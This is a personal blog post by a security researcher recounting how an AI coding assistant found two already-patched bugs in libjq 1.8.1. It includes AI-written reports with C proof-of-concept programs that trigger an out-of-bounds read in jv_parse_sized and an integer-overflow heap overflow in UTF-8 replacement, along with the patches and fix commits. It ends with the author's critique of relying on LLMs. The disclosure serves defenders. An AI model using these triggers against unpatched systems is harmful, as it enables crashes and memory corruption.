
Using LLM GPT 5.4 to Find a 0-day in Libjq and then Cry!


I am an experienced Vulnerability Researcher and Security Architect with 16+ years of experience across various verticals and horizontals, be it consumer electronics, semiconductors, automotive or others. I started as a software engineer on low-level embedded devices, writing everything from applications to kernel drivers on various operating systems, and then moved to my real calling, i.e. hacking. I love to stick to the golden old days of game hacking, BBS, shareware, phreaking, Phrack, the virus era, metal music, cheats and many more such cool things from the underground. I wear many hats from time to time as necessary - but I also love to help people and organizations deal with their core cybersecurity issues rather than hand them a checklist with a presentation. Opinions and posts on my site are purely my own and do not reflect my work.

Introduction & Disclaimer:

Everything found in this post was found by AI - I don't have access to other LLMs like "Mythos" or the other commercial tools from the various security companies in this market. This is purely based on LLM tools available to the common man. I would be an idiot to deny that LLMs, and not just the ones from misanthropic, can find bugs in source code, and at lightning speed.

I personally think this encourages "script kiddie" behaviour and is too good to be true as a saviour of humanity from oblivion. It also cranks "cognitive offloading" up to 20,000 km above ground, which is disastrous in the longer run - maybe not for an experienced researcher, but people starting out, people from other fields, or people with medium-level knowledge in a specific area can now just use this point-tool to get off on a fake high they were never worthy of in the first place.

Humans find the path of least resistance, and tasks that once pushed our cognitive limits are now being replaced with cheap prompts in noob syndicated language like "bruhh, find meh sum 0 dayz yaahh" - wtf the fucking fuck is this? Instead of: hmm, let me read up a little bit on how the parser for this certificate works, or how do I reach this function, and with what inputs?
"The thrill of pwning a system" - is what I live for!! (In this case, I missed it completely, because there was no sport to it, and I absolutely hate that.) But it seems this will probably be the future of finding bugs in source code, at least to some extent. Still, it will NEVER - let me repeat, "NEVER" - get even close to what a human brain is capable of, for the foreseeable future!

Why?

Shrouded in mystery, the extremely large claim that "Anthropic's Mythos can find 0-days for breakfast" is both good and bad.
I wanted to see for myself if other LLMs can do the same job and write a full-blown 0-day PoC, because firefox said "the zero days are numbered".

With some professional experience of finding 0-days in source code, and mostly in weird binary constructs, I decided to give it a try. But LLMs seem to take the fun out of everything for me. No Fun No Game!

Background:

One fine afternoon, after being continuously bombarded with AI posts, AI write-ups and the whole AI-finding-0-days hype, I decided to test drive the default LLM agent that comes with vscode, the chatGPT 5.4 model.
I went to github.com and checked out some open source libraries written in C/C++, and the first one trending that day was probably "libjq" - the jq processing library that, in simple terms, makes your JSON crap look a little better.
I wasn't much interested in the "jq" CLI but rather in "libjq", which people may have linked into their LLM-generated or superiorly hand-written codebases.

One shotting ?

So, I cloned the then-latest version, which was jq-1.8.1.
Just like everyone else on the internet, I took on the skiddie persona and said: "bruh chatGPT - find me a security issue in this entire codebase: vulnerable patterns for buffer overflow, use after free, double free, integer overflow, null pointer dereferences, underflows, pointer manipulations, off-by-one and all kinds of other categories of implementation or logical failure. Skip the cli utility and only look at code that would be used or linked into an existing code base, aka library code or code that exposes itself as an API or via other interfaces."
Churning.... Churning.. Churning....
It generated a ton of shit, as any LLM does, and I had to take some time to understand what was real. But hey, you can just say "find me some real bugs mf and ignore the junk/crap".
Churning... churning... Churning....
Some hits that may work ...

The thing is:

When I cloned the repo, it was the 9th of April 2026.

And the LLM found the two bugs the same day, within 4 hours.
Unfortunately, I just forgot about them and carried on with other things. Then one day I realized I should probably update the source tree and try again - this was around the 17th of April, and by this time both bugs, the exact same bugs, had been patched. I cried!!

This is not a story of how I, using an LLM, found bugs before someone else did - that's not the point at all. It's a story of LLMs for source code analysis finding the same bugs, which means a collision in pwn2own terms, and thus a duplicate, but completely valid as it came from two individual, disconnected sources of information.
Credits to the authors of the CVEs who reported these vulnerabilities and got them fixed!

So here is the bug report. Some of it, as you may have guessed, is AI generated - if only to justify doing this in the first place - but it misses the warmth that you need when reading something.

Bugs: (Below is LLM Generated content as LLM found it)

(I don't care if there are bugs in this section)

  1. An out-of-bounds read in the jv_parse_sized() parse-error path.

  2. An integer-overflow-driven heap overflow risk in invalid UTF-8 replacement logic.

Bug 1: jv_parse_sized() Error-reporting Out-of-Bounds Read

Vulnerable Version

Confirmed vulnerable tagged release:

  • jq-1.8.1

Verified vulnerable code in jq-1.8.1 tagged source:

value = jv_invalid_with_msg(jv_string_fmt("%s (while parsing '%s')",
                                          jv_string_value(msg),
                                          string));

This is vulnerable because jv_parse_sized() accepts a (pointer, length) buffer, but the final error formatting step falls back to plain %s, which treats the input as a NUL-terminated C string.

Bug Details

The bug lives in the parse error path of jv_parse_sized_custom_flags() in src/jv_parse.c.

The sized parser setup is correct:

parser_init(&parser, flags);
jv_parser_set_buf(&parser, string, length, 0);
jv value = jv_parser_next(&parser);

The unsafe part happens later, after parsing fails and jq tries to attach the original input to the error message:

jv_string_fmt("%s (while parsing '%s')", jv_string_value(msg), string)

Because string is only valid for length bytes, %s can read past the caller-supplied boundary looking for a terminating \0.

Security consequence:

  1. Out-of-bounds read in the error path

  2. Possible crash if the read crosses into unmapped memory

  3. Possible disclosure of adjacent readable bytes through the generated error string

PoC

#define _GNU_SOURCE

#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

#include "jv.h"

static void die(const char *what) {
  perror(what);
  exit(1);
}

int main(void) {
  long page_size_long = sysconf(_SC_PAGESIZE);
  if (page_size_long <= 0) {
    fprintf(stderr, "sysconf(_SC_PAGESIZE) failed\n");
    return 1;
  }

  size_t page_size = (size_t)page_size_long;

  char *mapping = mmap(NULL, page_size * 2, PROT_READ | PROT_WRITE,
                       MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  if (mapping == MAP_FAILED)
    die("mmap");

  if (mprotect(mapping + page_size, page_size, PROT_NONE) != 0)
    die("mprotect");

  memset(mapping, 'A', page_size);
  mapping[0] = '{';

  fprintf(stderr,
          "Calling jv_parse_sized() on a non-NUL-terminated malformed buffer.\n"
      "On a build with an out-of-bounds read in error formatting, this may\n"
      "SIGSEGV when the read crosses into the protected guard page.\n"
      "On the current fixed source build, it should return an error instead.\n");

  jv result = jv_parse_sized(mapping, (int)page_size);

  fprintf(stderr,
      "jv_parse_sized() returned instead of crashing. This is the expected\n"
      "result on the current source build in this workspace.\n");

  if (jv_invalid_has_msg(jv_copy(result))) {
    jv msg = jv_invalid_get_msg(result);
    fprintf(stderr, "Returned error: %s\n", jv_string_value(msg));
    jv_free(msg);
  } else {
    jv_free(result);
  }

  munmap(mapping, page_size * 2);
  return 0;
}

What the PoC does:

  1. Allocates two pages with mmap()

  2. Marks the second page PROT_NONE

  3. Fills the first page with non-NUL bytes

  4. Calls jv_parse_sized() on the first page

If jq formats the original input with %s, the read continues into the guard page and faults.

Vulnerable vs Patched

Vulnerable code:

value = jv_invalid_with_msg(jv_string_fmt("%s (while parsing '%s')",
                                          jv_string_value(msg),
                                          string));

Patched code:

value = jv_invalid_with_msg(jv_string_fmt("%s (while parsing '%.*s')",
                                          jv_string_value(msg),
                                          length,
                                          string));

Fix commit:

  • 2f09060afab23fe9390cce7cb860b10416e1bf5f

Patch hunk:

-    value = jv_invalid_with_msg(jv_string_fmt("%s (while parsing '%s')",
+    value = jv_invalid_with_msg(jv_string_fmt("%s (while parsing '%.*s')",
                                               jv_string_value(msg),
+                                              length,
                                               string));

Bug 2: Invalid UTF-8 Replacement Integer Overflow

Vulnerable Version

Confirmed vulnerable tagged release:

  • jq-1.8.1

Verified vulnerable code in jq-1.8.1 tagged source:

uint32_t maxlength = length * 3 + 1; // worst case: all bad bytes, each becomes a 3-byte U+FFFD

This is vulnerable because the worst-case output size for invalid UTF-8 replacement is computed in 32-bit arithmetic. For sufficiently large length, length * 3 + 1 can wrap to a smaller value.

Bug Details

The bug lives in jvp_string_copy_replace_bad() in src/jv.c.

That function is reached when jq receives sized string input with invalid UTF-8 and replaces invalid bytes with U+FFFD.

Affected call path:

jv jv_string_sized(const char* str, int len) {
  return
    jvp_utf8_is_valid(str, str+len) ?
    jvp_string_new(str, len) :
    jvp_string_copy_replace_bad(str, len);
}

The vulnerable size calculation was:

uint32_t maxlength = length * 3 + 1;

If this wraps low, jq allocates too small a buffer and then writes replacement output based on the full logical expansion.

Security consequence:

  1. Integer overflow in output size calculation

  2. Undersized heap allocation

  3. Heap buffer overflow during replacement writes

PoC

#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>

#include "jv.h"

#define WRAP_TRIGGER_LEN 1431655766

static void *map_bytes(size_t length) {
  void *ptr = mmap(NULL, length, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  if (ptr == MAP_FAILED) {
    fprintf(stderr, "mmap(%zu) failed: %s\n", length, strerror(errno));
    exit(1);
  }
  return ptr;
}

static void unmap_bytes(void *ptr, size_t length) {
  if (munmap(ptr, length) != 0) {
    fprintf(stderr, "munmap(%zu) failed: %s\n", length, strerror(errno));
    exit(1);
  }
}

static void trigger_string_api(void) {
  unsigned char *buf = map_bytes(WRAP_TRIGGER_LEN);
  memset(buf, 0x80, WRAP_TRIGGER_LEN);

  fprintf(stderr,
          "triggering jv_string_sized() with %d bytes of invalid UTF-8\n",
          WRAP_TRIGGER_LEN);

  jv value = jv_string_sized((const char *)buf, WRAP_TRIGGER_LEN);
  jv_free(value);
  unmap_bytes(buf, WRAP_TRIGGER_LEN);
}

static void trigger_parser_api(void) {
  size_t json_length = (size_t)WRAP_TRIGGER_LEN + 2;
  unsigned char *buf = map_bytes(json_length);

  buf[0] = '"';
  memset(buf + 1, 0x80, WRAP_TRIGGER_LEN);
  buf[json_length - 1] = '"';

  fprintf(stderr,
          "triggering jv_parse_sized() with a JSON string containing %d invalid UTF-8 bytes\n",
          WRAP_TRIGGER_LEN);

  jv value = jv_parse_sized((const char *)buf, (int)json_length);
  jv_free(value);
  unmap_bytes(buf, json_length);
}

int main(int argc, char **argv) {
  if (WRAP_TRIGGER_LEN <= 0 || WRAP_TRIGGER_LEN > INT_MAX - 2) {
    fprintf(stderr, "invalid trigger length\n");
    return 2;
  }

  if (argc > 1 && strcmp(argv[1], "--parse") == 0) {
    trigger_parser_api();
    return 0;
  }

  trigger_string_api();
  return 0;
}

What the PoC does:

  1. Allocates a very large input buffer

  2. Fills it with invalid UTF-8 bytes

  3. Sends it through jv_string_sized() or jv_parse_sized()

  4. Targets the length * 3 + 1 wraparound condition in the historical code

Vulnerable vs Patched

Vulnerable code:

uint32_t maxlength = length * 3 + 1; // worst case: all bad bytes, each becomes a 3-byte U+FFFD

Patched code:

uint64_t maxlength = (uint64_t)length * 3 + 1;
if (maxlength >= INT_MAX) {
  return jv_invalid_with_msg(jv_string("String too long"));
}

Fix commit:

  • e47e56d226519635768e6aab2f38f0ab037c09e5

Patch hunk:

-  uint32_t maxlength = length * 3 + 1; // worst case: all bad bytes, each becomes a 3-byte U+FFFD
+  // worst case: all bad bytes, each becomes a 3-byte U+FFFD
+  uint64_t maxlength = (uint64_t)length * 3 + 1;
+  if (maxlength >= INT_MAX) {
+    return jv_invalid_with_msg(jv_string("String too long"));
+  }

End of LLM Generated content ---------

Is the Thrill of Pwning a System Gone?

Someone like me doesn't do anything just because everyone else is doing it - what I do is deeply rooted in how interested I am in the topic, and in whether I feel a sense of achievement after racking my brains for months. The answer for me is simple: finding bugs with LLMs, even if they are 0-days, is meaningless to me, because it doesn't stimulate my brain the way doing it myself does. That dopamine hit that lasts for days is the reason I got into this field and what actually motivated me since childhood.
I know my process is slower and using LLMs is much faster, but I would rather skip the brain rot it brings - and the bad taste it leaves in my mouth after blowing hours on it - and stick to my way.

Conclusions

It doesn't matter which LLM vendor or software you use; the latest models are all capable of finding security issues, at least in source code. How good the findings are depends on the person using the LLM, not on the LLM itself.
So, there is nothing special about "Mythos" or any other model for that matter.

LLMs probably are the future for source-code-level analysis and have uses in various other fields. I believe an LLM is only as good as an auto-complete tool that, when prompted enough, may or may not lead you to your outcome.
This run was just an example, and it doesn't make it true that only LLMs can now find bugs; it probably just shortens the time.
But again, this is a road to brain rot, for the reasons mentioned above.

LLMs are not a substitute that you can offload everything to and forget the world exists, nor do they make you better - trust me, they don't, for several reasons ranging from cognitive offloading, dissonance, forgetting things and not pushing your mental limits, to skipping the learning process entirely and just pure vibing. These things are detrimental to your brain power in the longer run. We humans never learned anything by skipping things, so why should LLMs change that just because they can single-shot everything?
The amount of time you spend prompting the LLM could be better spent learning or understanding things at a deeper level, which brings determinism to your brain, and you can use that new information to plan and design things better.

I also feel the usage of LLMs is over-hyped beyond recognition these days, and that will continue to happen.
However, as we saw in this write-up, it is also true that various industries will continue to evolve, pushing forward various agendas and marketing material. But real life is not like prompting, where you get things quickly; it's a combination of things. If I were to encounter a "person" who behaved like an LLM, I would probably slap him out of existence. E.g. think about explaining a refund issue for your flight ticket to a (real) customer care executive who doesn't understand, keeps asking you for the same information and keeps circling back to the same thing again and again in different ways - LLM prompting is like that. Wouldn't it be much simpler to just talk to a human and get your things resolved in a biological way?

Question for you:

Who would you send the T-800 to kill?

We are the Resistance!
